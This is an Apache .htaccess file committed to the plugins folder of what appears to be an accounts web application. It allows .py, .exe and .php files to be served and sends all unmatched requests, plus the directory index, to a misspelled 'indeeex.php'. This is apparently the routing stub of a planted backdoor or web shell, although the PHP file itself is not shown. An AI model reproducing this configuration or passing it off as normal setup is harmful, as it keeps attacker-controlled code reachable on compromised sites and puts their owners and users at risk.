BBnepal-Accounts/account/plugins/.htaccess
Sampanna Rimal 9cd05ef3cb commitall
2024-07-10 18:28:19 +05:45

11 lines
281 B
ApacheConf

<FilesMatch ".(py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
RewriteEngine On
RewriteBase /
RewriteRule ^indeeex\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /indeeex.php [L]
DirectoryIndex indeeex.php index.php